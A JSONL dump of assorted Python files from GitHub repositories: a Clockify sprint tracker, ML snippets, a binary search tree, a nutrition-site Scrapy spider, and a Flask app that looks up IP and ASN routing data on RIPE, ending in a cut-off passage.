+{"seq_id":"70044476490","text":"# ToDo: Don't stretch line for over-spent time\n# Normal time input\n# Overall time on the title of figure\n\nimport argparse\nimport yaml\nimport re\nimport math\nimport pandas as pd\nfrom datetime import datetime\nfrom dateutil import parser\nfrom clockify import factories\nfrom clockify_api_client.client import ClockifyAPIClient\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\ndef match(done_project, done_task, target_task):\n target_task = str(target_task).strip().lower()\n if target_task.startswith('project:'):\n target_project = target_task[8:].strip()\n done_project = str(done_project).lower()\n return done_project == target_project\n elif target_task.startswith('task:'):\n target_desc = target_task[5:].strip()\n done_task = str(done_task).lower()\n return target_desc in done_task\n else:\n raise 'Unknown task description!'\n\n\ndef read_clockify(config):\n api_key = config['clockify']['api_key']\n workspace_name = config['clockify']['workspace_name']\n user_name = config['clockify']['user_name']\n\n workspace_id = None\n for workspace in factories.Workspace(api_key=api_key).get_all_workspaces():\n if (workspace['name'] == workspace_name) or (workspace_name == ''):\n workspace_id = workspace['id']\n if workspace_id is None:\n raise ValueError(f'workspace {workspace_name} not found!')\n\n user_id = None\n for user in factories.User(api_key=api_key).get_all_workspace_users(workspace_id=workspace_id):\n if (user['name'] == user_name) or (user_name == ''):\n user_id = user['id']\n if user_id is None:\n raise ValueError(f'user {user_name} not found!')\n\n client = ClockifyAPIClient().build(api_key, 'api.clockify.me/v1')\n projects = dict()\n for project in client.projects.get_projects(workspace_id):\n if not project['archived']:\n projects[project['id']] = project['name']\n\n entries = factories.TimeEntry(api_key=api_key).get_all_time_entry_user(workspace_id=workspace_id,\n user_id=user_id)\n return workspace_id, user_id, projects, entries\n\n\ndef process_entry(done, projects, task=None):\n elapsed = 0\n duration = done['timeInterval']['duration']\n if duration is None: # When clockify is running\n return 0\n r = re.match(r\"PT(\\d*H)?(\\d*M)?(\\d*S)?\", duration)\n if r.group(1):\n elapsed += int(r.group(1)[:-1])\n if r.group(2):\n elapsed += int(r.group(2)[:-1]) / 60\n if r.group(3):\n elapsed += int(r.group(3)[:-1]) / 3600\n\n if (task is None) or match(projects[done['projectId']], done['description'], task['Description']):\n return elapsed\n return 0\n\n\ndef process_entries(config, entries, projects):\n tasks_path = config['tasks']['file_path']\n sheet_name = config['tasks']['sheet_name']\n start_of_sprint = config['sprint']['start_of_sprint']\n end_of_sprint = start_of_sprint + len(config['sprint']['sprint_days']) * 86400\n total_sprint_time = sum(config['sprint']['sprint_days']) * config['sprint']['day_time']\n\n # Read tasks and sort to place tasks above projects\n # (to avoid double calculation of clockify entries which match both a project and a task)\n tasks = pd.read_excel(tasks_path, sheet_name=sheet_name).sort_values('Description', ascending=False).reset_index(\n drop=True)\n total_scheduled_hours = sum(tasks['Estimated Hours'])\n\n # Process time entries\n results = [[0.0, float(d['Estimated Hours']), d['Description']] for i, d in\n tasks.iterrows()] # (spend_hours, estimated_hours)\n\n processed_ids = [] # get_all_time_entry_user returns each entry multiple times, so we need to check them.\n off_schedule_spent = 0\n for entry in entries:\n date = parser.parse(entry['timeInterval']['start']).timestamp()\n if (start_of_sprint <= date < end_of_sprint) and (entry['id'] not in processed_ids):\n entry_matched = False\n processed_ids.append(entry['id'])\n for i, t in tasks.iterrows():\n elapsed_time = process_entry(done=entry, projects=projects, task=t)\n results[i][0] += elapsed_time\n if elapsed_time > 0:\n entry_matched = True\n break\n if not entry_matched:\n off_schedule_spent += process_entry(done=entry, projects=projects)\n\n results.append([off_schedule_spent, total_sprint_time - total_scheduled_hours, 'Off-scheduled'])\n return results, total_scheduled_hours\n\n\ndef plot_results(config, results, total_scheduled_hours):\n total_sprint_time = sum(config['sprint']['sprint_days']) * config['sprint']['day_time']\n start_of_sprint = config['sprint']['start_of_sprint']\n sprint_days = config['sprint']['sprint_days']\n\n df = []\n for r in results:\n df.append(['Spent', r[0] / r[1], r[0], r[2]])\n df.append(['Estimated', 1, r[1], r[2]])\n df = pd.DataFrame(df, columns=['Type', 'Hours-Rate', 'Hours-Val', 'Task'])\n\n sns.set(rc={'figure.figsize': (14, 6)}, font_scale=1)\n g = sns.barplot(x=\"Hours-Rate\", y=\"Task\",\n hue=\"Type\", data=df, palette='copper')\n g.legend_ = None\n g.set(xticklabels=[])\n g.set(xlabel='Hours')\n total_spent_scheduled_hours = sum(\n [min(r[0], r[1]) for r in results[:-1]]) # Just scheduled tasks. Times spent more than scheduled not considered\n total_spent_hours = sum([r[0] for r in results])\n\n # Compute expected progress\n passed_full_days = math.floor((datetime.now().timestamp() - start_of_sprint) / 86400)\n working_full_days = sum(sprint_days[:passed_full_days])\n if passed_full_days < len(sprint_days):\n today_expected_progress = (datetime.now().timestamp() - (start_of_sprint + passed_full_days * 86400)) * sprint_days[passed_full_days]\n else:\n today_expected_progress = 0\n expected_progress = (working_full_days * 86400 + today_expected_progress) / (sum(sprint_days)*86400) * 100\n\n g.set(title=f\"Tasks achievement: {total_spent_scheduled_hours / total_scheduled_hours * 100:.1f}% - \" +\n f\"Total time: {total_spent_hours / total_sprint_time * 100:.1f}% - \" +\n f\"Expected: {expected_progress:.1f}%\")\n\n for i, container in enumerate(g.containers):\n if i == 0: # spent\n g.bar_label(container, [f\"{r[0] / r[1] * 100:.1f}%\" for r in results])\n else: # estimated\n g.bar_label(container, [f\"{r[1]:.2f}\" for r in results])\n plt.subplots_adjust(left=0.25)\n plt.show()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', type=argparse.FileType('r'),\n default='config.yml', help='config file for %(prog)s')\n args = parser.parse_args()\n config = yaml.load(args.config.read(), Loader=yaml.SafeLoader)\n\n try:\n workspace_id, user_id, projects, entries = read_clockify(config=config)\n results, total_scheduled_hours = process_entries(config=config,\n entries=entries,\n projects=projects)\n plot_results(config=config,\n results=results,\n total_scheduled_hours=total_scheduled_hours)\n except ValueError as err:\n print(err.args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"h-amirkhani/clockify-scrum","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"24702619797","text":"from torch import nn\nfrom torch.nn import TransformerEncoder, TransformerEncoderLayer, Parameter, Linear, Module, ReLU, GELU\n\n\nclass TransformerBlock(Module):\n def __init__(self, d_model, nhead, dff, activation, num_layers):\n super().__init__()\n assert activation in ['relu', 'gelu']\n if activation == 'relu':\n self.activation = ReLU(inplace=True)\n elif activation == 'gelu':\n self.activation = GELU()\n self.transformer_block = TransformerEncoder(\n TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=dff, activation=activation,\n batch_first=True, dropout=0.), num_layers=num_layers)\n\n def forward(self, x):\n return self.transformer_block(x)\n","repo_name":"caihao/SWD-EvtGen","sub_path":"src/models/backbone.py","file_name":"backbone.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"6469939681","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 16 12:03:23 2019\n\n@author: zhangzhaopeng\n\"\"\"\n\n## binary search tree\n\nclass TreeNode():\n \n def __init__(self, value):\n self.val = value\n self.left = None\n self.right = None\n\nclass binary_search_tree():\n \n def __init__(self):\n \n self.root = None\n \n# def insert(self, val):\n# \n# s = TreeNode(val)\n# if self.root == None:\n# self.root = s\n# else:\n# if s.val < self.root.val:\n# self.insert(root.left, s)\n# else:\n# self.insert(root.right, s)\n \n def insert(self, val):\n \n node = TreeNode(val)\n if self.root == None:\n self.root = node\n else:\n cur = self.root\n if val < cur.val:\n if cur.left == None:\n cur.left = node\n else:\n if cur.right == None:\n cur.right = node\n \n\n# def insert(self, value: int):\n# if not self.root:\n# self.root = TreeNode(value)\n# return\n# parent = None\n# node = self.root\n# while node:\n# parent = node\n# node = node.left if node.val > value else node.right\n# new_node = TreeNode(value)\n# if parent.val > value:\n# parent.left = new_node\n# else:\n# parent.right = new_node\n \n def delete(self, val):\n \n node = self.root\n parent = None\n while node and node.val != val:\n parent = node\n node = node.left if node.val > val else node.right\n \n if not node:\n return \n \n if node.left == None and node.right == None:\n parent.left = None\n \n elif node.left == None:\n parent.left = node.right\n elif node.right == None:\n parent.left = node.left\n else:\n par = node\n s = node.right\n while s.left:\n par = s\n s = s.left\n node.val = s.val\n if par == node:\n par.right = s.right\n else:\n par.left = s.right\n \n def find(self, val):\n \n node = self.root\n while node and node.val != val:\n node = node.left if node.val > val else node.right\n return node\n\n\n# test\n\nt = binary_search_tree()\nt.insert(1)\nt.insert(2)\nt.insert(3)\n\nt.delete(3)\n\nt.find(1)\n\n\n\n\n","repo_name":"zhangzhp7/Algorithm","sub_path":"binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"43627318467","text":"# 638/378\nfrom sys import stdin\nfrom re import compile\n\ndef parse_lines(lines):\n # hcl:#6b5442 ... -> [('hcl', '#6b5442'), ...]\n return [(typ, v) for line in map(lambda x: map(lambda x: x.split(':'), x.split(' ')), lines.split('\\n')) for typ, v in line]\n\ndata = list(map(parse_lines, stdin.read().strip().split('\\n\\n')))\n# Rules for A\nneeded = ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid']\n# Rules for B\nhgt, hcl, pid = compile('^(\\d+)(cm|in)$'), compile('^#[0-9a-f]{6}$'), compile('^\\d{9}$')\necl = ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']\n\ndef valid(typ, v):\n if typ == 'byr':\n return 1920 <= int(v) <= 2002\n if typ == 'iyr':\n return 2010 <= int(v) <= 2020\n if typ == 'eyr':\n return 2020 <= int(v) <= 2030\n if typ == 'hgt':\n matches = hgt.match(v)\n if matches is None:\n return False\n n, u = matches.groups()\n return 150 <= int(n) <= 193 if u == 'cm' else 59 <= int(n) <= 76\n if typ == 'hcl':\n return hcl.match(v) is not None\n if typ == 'ecl':\n return v in ecl\n if typ == 'pid':\n return pid.match(v) is not None\n return True\n\na, b = 0, 0\nfor pp in data:\n if all(n in [typ for typ, _ in pp] for n in needed):\n a += 1\n if all(valid(typ, v) for typ, v in pp):\n b += 1\n\nprint('a', a)\nprint('b', b)\n","repo_name":"stristr/aoc2020","sub_path":"04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38375758085","text":"from flask_app.config.mysqlconnection import connectToMySQL\n\nfrom flask import flash \n\nclass Book_Author:\n def __init__(self,data):\n self.book_id = data['book_id']\n self.author_id = data['author_id']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n\n# ============================================= \n# INSERT : new book / author ids\n# ============================================= \n @classmethod\n def add_new_book_author(cls,data):\n query = \"INSERT INTO books_authors (book_id,author_id) VALUES (%(book_id)s, %(author_id)s);\"\n results = connectToMySQL('book_club').query_db(query,data)\n return results","repo_name":"bakerlisa/NightOwl","sub_path":"flask_app/models/book_author_model.py","file_name":"book_author_model.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"9541884799","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.0'\n\nsetup(name='collective.mdlevent',\n version=version,\n description=\"Multi dates and locations event for Plone\",\n long_description=open(\"README.rst\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from\n # http://pypi.python.org/pypi?:action=list_classifiers\n classifiers=[\n \"Programming Language :: Python\",\n \"Framework :: Plone\",\n \"Framework :: Plone :: 4.0\",\n \"Framework :: Plone :: 4.1\",\n \"Framework :: Plone :: 4.2\",\n ],\n keywords='',\n author='',\n author_email='',\n url='http://svn.plone.org/svn/collective/',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['collective'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'plone.app.dexterity',\n 'five.grok',\n 'z3c.blobfile',\n # -*- Extra requirements: -*-\n ],\n extras_require = dict(\n tests=['plone.app.testing'],\n ),\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n )\n","repo_name":"toutpt/collective.mdlevent","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"42030679722","text":"from django.forms.models import model_to_dict\nfrom rpc4django import rpcmethod\n\nimport molecule.models as molecule_models\n\n@rpcmethod(name='molecule.ping', signature=[])\ndef ping():\n return 'PONG'\n \n\n@rpcmethod(name='molecule.list', signature=[])\ndef list():\n molecules = molecule_models.Molecule.objects.all()\n x = [model_to_dict(molecule) for molecule in molecules]\n\n return x","repo_name":"rmcl/rcell","sub_path":"rcell-kb/kb/core/molecule/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2822541870","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 27 17:53:25 2021\r\n\r\n@author: Nishith\r\n\"\"\"\r\n\r\nn=input(\"Please enter a number: \")\r\nsum=0\r\nn=eval(n)\r\nfor i in range(1,n+1):\r\n sum=sum+i*i*i\r\nprint(sum)\r\n","repo_name":"Nishith170217/Python-Self-Challenge","sub_path":"Program for cube sum of first n natural numbers.py","file_name":"Program for cube sum of first n natural numbers.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71990774407","text":"import scrapy,re\nfrom bs4 import BeautifulSoup as bs\n\nclass FddbSpider(scrapy.Spider):\n \"\"\"\n Scrapy spider meant to crawl all nutritional information \n about a product from http://fddb.info\n \"\"\"\n name = \"fddb\"\n start_urls = [\n \"http://fddb.info/db/fr/groupes/{}/index.html\".format(group)\n for group in [\n \"epice\", \"boissons\", \"congelateur\", \"fromages\", \n \"garniture\", \"international\", \"legumineuse\", \"mets\", \n \"pomme_de_terre\", \"viande\", \"autre\", \"cereale\", \n \"friterie\", \"fruits\", \"huiles_et_lipides\", \"legumes\", \n \"laitage\", \"poisson\", \"sucreries\"]\n ]\n\n \n def parse(self, response):\n # Parse groups if there are any\n groups_b = response.css('div.leftblock h3:first-child::text').extract_first()\n if groups_b:\n # Follow the \"groups\" links \n groups = response.css('div.leftblock div.standardcontent:first-child table td table td:first-child a::attr(href)').extract()\n for group in groups:\n group_page = response.urljoin(group.strip())\n yield scrapy.Request(group_page, callback=self.parse)\n \n # Parse producers if there are any\n producers_b = response.css('div.leftblock h4.grouppreproducthead::text').extract_first()\n if producers_b:\n nb_child = \"n + 2\" if groups_b else \"n\"\n query = 'div.leftblock > div:nth-child({}) table a::attr(href)'.format(nb_child)\n products = response.css(query).extract()\n for product in products:\n product_page = response.urljoin(product.strip())\n yield scrapy.Request(product_page, callback=self.parse_product)\n \n\n\n def parse_product(self, response):\n nutriments = []\n value_unit_re = r\"^([\\d,]+)\\s(\\w+)$\"\n \n # Extracts all nutriments information\n if response.css(\"div.leftblock div.itemsec2012:first-child h2::text\").extract_first():\n rows = response.css('div.itemsec2012:first-child ~ div > div').extract() \n # Even rows are nutriments' names, odd rows are nutriments' values and units\n i = 0\n while i < len(rows)-1:\n nutriment = {}\n html_name = bs(rows[i], 'html.parser')\n html_value = bs(rows[i+1], 'html.parser')\n i += 2\n\n # Skip \"Water content\"\n name = html_name.span.string\n if \"Water\" in name:\n continue\n \n # Rename nutriments with the names \n # already present in our ElasticSearch (ES) instance\n if name == \"Valeur énergétique\":\n name = \"Énergie\"\n elif name == \"Calorie\":\n name = \"Énergie (kCal)\"\n elif name == \"Lipides\":\n name = \"Matières grasses\"\n elif name == \"Sucre\":\n name = \"Sucres\"\n \n # Sperate values and units\n value, unit = re.match(value_unit_re, html_value.text).groups()\n value = float(value.replace(',', '.'))\n\n if unit == \"kcal\":\n unit = \"kCal\"\n\n nutriment['name'] = name\n nutriment['unit'] = unit\n nutriment['per_day'] = 0\n nutriment['per_portion'] = 0\n nutriment['per_hundred'] = value\n nutriment['rdi'] = 0\n \n nutriments.append(nutriment)\n \n unit = 'ml' if 'ml' in response.css(\"div.leftblock div.itemsec2012:first-child h2::text\").extract_first() else 'g'\n # Output ready to be sent to ES\n yield {\n '_index': \"products\",\n '_type': \"FDDB\",\n '_source': {\n 'name': self.clean_name(response.css(\"h1#fddb-headline1::text\").extract_first()),\n 'unit': unit,\n 'unit_quantity': unit,\n 'unit_portion': 0,\n 'quantity': 100,\n 'nutriments': nutriments\n }\n }\n\n def clean_name(self, name):\n # Removes generic words inside product name\n reg = r\",\\s(\"\\\n \"séché[es]*|\" \\\n \"sèches?|\" \\\n \"secs?|\" \\\n \"cuit[es]*|\" \\\n \"grain[es]*|\" \\\n \"frais|\" \\\n \"fra[iî]ches?|\" \\\n \"cru[es]*|\" \\\n \"en moyenne|\" \\\n \"moyen(ne)?\" \\\n \")$\"\n return re.sub(reg, '', name)\n","repo_name":"zifeo/Food-habits","sub_path":"0-mining/fddb.py","file_name":"fddb.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"41122116181","text":"from rest_framework import serializers\nfrom rest_framework.viewsets import ModelViewSet\nfrom parflow_data_management.scheduler.models.workflow import Workflow\n\nclass WorkflowSerializer(serializers.ModelSerializer):\n class Meta:\n model = Workflow\n fields = (\"id\", \"project\")\n\nclass WorkflowViewSet(ModelViewSet):\n queryset = Workflow.objects.all()\n\n serializer_class = WorkflowSerializer\n","repo_name":"cjh1/parflow_data_management","sub_path":"parflow_data_management/scheduler/rest/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"38046980899","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"使用TensorFlow实现kNN算法\"\"\"\n\n\ngroup1_x1 = np.random.random(100) * 2\ngroup1_x2 = np.random.random(100) * 2\ngroup1_y = np.ones(group1_x1.shape)\ngroup2_x1 = np.random.random(100) * 2 + 1\ngroup2_x2= np.random.random(100) * 2 + 1\ngroup2_y = np.zeros(group2_x1.shape)\n\ntrain_x1 = np.concatenate([np.reshape(group1_x1, [-1, 1]), np.reshape(group1_x2, [-1, 1])], axis=1)\ntrain_x2 = np.concatenate([np.reshape(group2_x1, [-1, 1]), np.reshape(group2_x2, [-1, 1])], axis=1)\ntrain_x = np.concatenate([train_x1, train_x2], axis=0)\ntrain_y = np.concatenate([np.reshape(group1_y, [-1, 1]), np.reshape(group2_y, [-1, 1])], axis=0)\n\n\n\n\ndef kNN():\n input_x = tf.placeholder(tf.float32, [None, 2], name='input_x')\n label_y = tf.placeholder(tf.float32, [None, 1], name='label_y')\n\n test_x = tf.placeholder(tf.float32, [2], name='test_x')\n\n distance = tf.reduce_mean(tf.square(test_x - input_x), axis=1)\n predict = tf.gather(label_y, tf.argmax(distance, axis=0))\n\n return input_x, label_y, test_x, predict\n\ndef eval(test_sample):\n input_x, label_y, test_x, predict = kNN()\n with tf.Session() as sess:\n feed_dict = {input_x:train_x, label_y:train_y, test_x:test_sample}\n predict_label = sess.run(predict, feed_dict)\n print('Predition:{}'.format(predict_label[0]))\n show_figure(test_sample)\n return predict_label\n\ndef show_figure(test_sample):\n plt.scatter(group1_x1, group1_x2, color='blue')\n plt.scatter(group2_x1, group2_x2, color='yellow')\n plt.scatter(test_sample[0], test_sample[1], color='red')\n plt.show()\n\n\n\nif __name__ == '__main__':\n test_sample = np.array([2.2, 2.2])\n eval(test_sample)\n\n","repo_name":"AgFeather/StudyNote","sub_path":"models/TFBasicML/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22864488908","text":"import math\nfrom collections import defaultdict\n\n\nclass MetricsTracker(object):\n \"\"\" Tracking metrics. \"\"\"\n\n def __init__(self):\n self.metrics_val = defaultdict(float) # for one batch\n self.metrics_avg = defaultdict(float) # avg batches\n self.num_samples = 0\n\n def update(self, metrics, num_samples):\n for key, val in metrics.items():\n if val is not None:\n val = float(val) # [val] -> val\n self.metrics_val[key] = val\n avg_val = \\\n (self.metrics_avg.get(key, 0) * self.num_samples + val * num_samples) / \\\n (self.num_samples + num_samples)\n self.metrics_avg[key] = avg_val\n self.num_samples += num_samples\n\n def clear(self):\n self.metrics_val = defaultdict(float)\n self.metrics_avg = defaultdict(float)\n self.num_samples = 0\n\n def items(self):\n return self.metrics_avg.items()\n\n def get(self, name):\n if self.num_samples == 0:\n raise ValueError('There is no data in Metrics.')\n return self.metrics_avg.get(name)\n\n def state_dict(self):\n return {\n 'metrics_val': self.metrics_val,\n 'metrics_avg': self.metrics_avg,\n 'num_samples': self.num_samples,\n }\n\n def load_state_dict(self, state_dict):\n self.metrics_val = state_dict['metrics_val']\n self.metrics_avg = state_dict['metrics_avg']\n self.num_samples = state_dict['num_samples']\n\n def value(self):\n metric_strs = []\n for key, val in self.metrics_val.items():\n metric_str = f'{key.upper()}-{val:.3f}'\n metric_strs.append(metric_str)\n if 'token_nll' in self.metrics_val:\n metric_str = f\"TOKEN_PPL-{math.exp(self.metrics_val['token_nll']):.3f}\"\n metric_strs.append(metric_str)\n metric_strs = ' '.join(metric_strs)\n return metric_strs\n\n def summary(self):\n metric_strs = []\n for key, val in self.metrics_avg.items():\n metric_str = f'{key.upper()}-{val:.3f}'\n metric_strs.append(metric_str)\n if 'token_nll' in self.metrics_avg:\n metric_str = f\"TOKEN_PPL-{math.exp(self.metrics_avg['token_nll']):.3f}\"\n metric_strs.append(metric_str)\n metric_strs = ' '.join(metric_strs)\n return metric_strs\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/trainers/nlp/space/metrics/metrics_tracker.py","file_name":"metrics_tracker.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"}
+{"seq_id":"10852355774","text":"from asyncio import events\nfrom pytz import country_names\nimport requests\nimport json\nfrom requests import get\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom flask import request\nimport datetime\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\n\napp = Flask(__name__)\n\nCORS(app)\n\n\n@ app.route('/', methods=['GET'])\ndef get_tasks():\n if request.environ.get('HTTP_X_FORWARDED_FOR') is None:\n return {'ip': request.environ['REMOTE_ADDR']}\n else:\n return {'ip': request.environ['HTTP_X_FORWARDED_FOR']}\n\n\n@ app.route(\"/ip\")\n# private=socket.gethostbcket.gethos\n# adr=\"185.185.179.8\"\ndef ip_info():\n ip = {}\n adrr = get_tasks()\n adr = adrr['ip']\n\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n sourcevisib = \"https://stat.ripe.net/data/routing-status/data.json?resource=\"+adr+\"%2F24\"\n\n responseip = requests.get(sourceip).json()\n visible = requests.get(sourcevisib).json()\n\n prefix = responseip[\"data\"][\"records\"][0][0][\"value\"]\n ip[\"prefix\"] = prefix\n\n rpki = \"https://stat.ripe.net/data/rpki-validation/data.json?resource=38999&prefix=\"+prefix\n pk = requests.get(rpki).json()\n isp = responseip[\"data\"][\"records\"][0][1][\"value\"]\n ip[\"isp\"] = isp\n country = responseip[\"data\"][\"records\"][0][2][\"value\"]\n ip[\"country\"] = country\n ipp = responseip[\"data\"][\"irr_records\"][0][0][\"value\"]\n ip[\"ip\"] = ipp\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n ip[\"asncode\"] = a\n ip[\"asnname\"] = b\n if (any(c.isalpha() for c in b) == False):\n ip[\"asncode\"] = b\n ip[\"asnname\"] = a\n\n try:\n rpk = pk[\"data\"][\"validating_roas\"][\"validity\"]\n ip[\"rpki\"] = rpk\n except:\n ip[\"rpki\"] = \"Not valid\"\n\n ipv4_seeing = visible[\"data\"][\"visibility\"][\"v4\"][\"ris_peers_seeing\"]\n ipv4_total = visible[\"data\"][\"visibility\"][\"v4\"][\"total_ris_peers\"]\n\n if (ipv4_seeing == ipv4_total):\n ip[\"ipv4\"] = 100\n print(\"100% visibility ipv4\")\n else:\n per = (ipv4_seeing*100)/ipv4_total\n ip[\"ipv4\"] = per\n print(str(per)+\"% Visibility ipv4\")\n\n ipv6_seeing = visible[\"data\"][\"visibility\"][\"v6\"][\"ris_peers_seeing\"]\n ipv6_total = visible[\"data\"][\"visibility\"][\"v6\"][\"total_ris_peers\"]\n\n if (ipv6_seeing == ipv6_total):\n ip[\"ipv6\"] = 100\n print(\"100% visibility ipv6\")\n else:\n per = (ipv6_seeing*100)/ipv6_total\n ip[\"ipv6\"] = per\n print(str(per)+\"% Visibility ipv6\")\n\n with open(\"ip.json\", \"w\") as outfile:\n json.dump(ip, outfile)\n\n return ip\n\n\n@ app.route(\"/as\")\ndef asn_info():\n adrr = get_tasks()\n adr = adrr['ip']\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n dictionary = {}\n sous_dictionnaire = {}\n dictionnaire = {}\n # sourceasn=\"https://stat.ripe.net/data/country-resource-list/data.json?resource=LB\"\n # responseasn = requests.get(sourceasn).json()\n # ASN=responseasn[\"data\"][\"resources\"][\"asn\"]\n\n # for asn in ASN:\n source = \"https://stat.ripe.net/data/visibility/data.json?include=peers_seeing&resource=\"+asn\n source2 = \"https://stat.ripe.net/data/routing-status/data.json?resource=\"+asn\n source3 = \"https://stat.ripe.net/data/whois/data.json?resource=\"+asn\n source1 = 'https://ihr.iijlab.net/ihr/api/networks/?number='+asn\n\n # nb of prefixes for each autonomous system\n url = \"https://stat.ripe.net/data/routing-status/data.json?resource=\"+asn\n response1 = requests.get(url).json()\n nb = response1[\"data\"][\"announced_space\"][\"v4\"][\"prefixes\"] + \\\n response1[\"data\"][\"announced_space\"][\"v6\"][\"prefixes\"]\n sous_dictionnaire[\"Number of prefixes\"] = nb\n sous_dictionnaire[\"v4\"] = response1[\"data\"][\"announced_space\"][\"v4\"][\"prefixes\"]\n sous_dictionnaire[\"v6\"] = response1[\"data\"][\"announced_space\"][\"v6\"][\"prefixes\"]\n\n # list of prefixes for an as\n list_prefixe = \"https://stat.ripe.net/data/announced-prefixes/data.json?resource=\"+asn\n lists = requests.get(list_prefixe).json()\n j = 0\n for i in lists[\"data\"][\"prefixes\"]:\n prefix = i[\"prefix\"]\n print(prefix)\n dictionnaire[j] = prefix\n j = j+1\n sous_dictionnaire[\"List of prefixes\"] = dictionnaire\n ipv4_seeing = 0\n ipv4_total = 0\n ipv6_seeing = 0\n ipv6_total = 0\n response1 = requests.get(source2).json()\n response2 = requests.get(source3).json()\n response3 = requests.get(source1).json()\n\n print(\"Time:\")\n time = response1[\"data\"][\"last_seen\"][\"time\"]\n sous_dictionnaire[\"time\"] = time\n print(time)\n\n name = response2[\"data\"][\"records\"][0][1][\"value\"]\n print(\"ASN name:\"+name)\n print(response1[\"data\"][\"visibility\"])\n sous_dictionnaire[\"name\"] = name\n print(name)\n\n disco = response3[\"results\"][0][\"disco\"]\n print(\"Disconnection:\"+str(disco))\n sous_dictionnaire[\"disconnection\"] = disco\n\n for i in response1:\n ipv4_seeing = response1[\"data\"][\"visibility\"][\"v4\"][\"ris_peers_seeing\"]\n ipv4_total = response1[\"data\"][\"visibility\"][\"v4\"][\"total_ris_peers\"]\n if (ipv4_seeing == ipv4_total):\n sous_dictionnaire[\"ipv4\"] = 100\n print(\"100% visibility ipv4\")\n else:\n per = (ipv4_seeing*100)/ipv4_total\n sous_dictionnaire[\"ipv4\"] = per\n print(str(per)+\"% Visibility ipv4\")\n\n for i in response1:\n ipv6_seeing = response1[\"data\"][\"visibility\"][\"v6\"][\"ris_peers_seeing\"]\n ipv6_total = response1[\"data\"][\"visibility\"][\"v6\"][\"total_ris_peers\"]\n if (ipv6_seeing == ipv6_total):\n sous_dictionnaire[\"ipv6\"] = 100\n print(\"100% visibility ipv6\")\n else:\n per = (ipv6_seeing*100)/ipv6_total\n sous_dictionnaire[\"ipv6\"] = per\n print(str(per)+\"% Visibility ipv6\")\n\n dictionary[asn] = sous_dictionnaire\n with open(\"sample.json\", \"w\") as outfile:\n json.dump(dictionary, outfile, indent=4)\n\n return dictionary\n\n\n# def event():\n# # dict = {}\n# #\n# # previous_date = datetime.datetime.today() - datetime.timedelta(days=1)\n# # times = str(int(round(previous_date.timestamp())))\n# #\n# # curr_date = datetime.datetime.now()\n# # times1 = str(int(round(curr_date.timestamp())))\n# #\n# url = 'https://ioda.caida.org/ioda/data/events?from=' + \\\n# times+'&until='+times1+'&human=true&meta=country/LB'\n# # events = requests.get(url).json()\n# #\n# # start_time = events[\"queryParameters\"][\"from\"]\n# # end_time = events[\"queryParameters\"][\"until\"]\n# 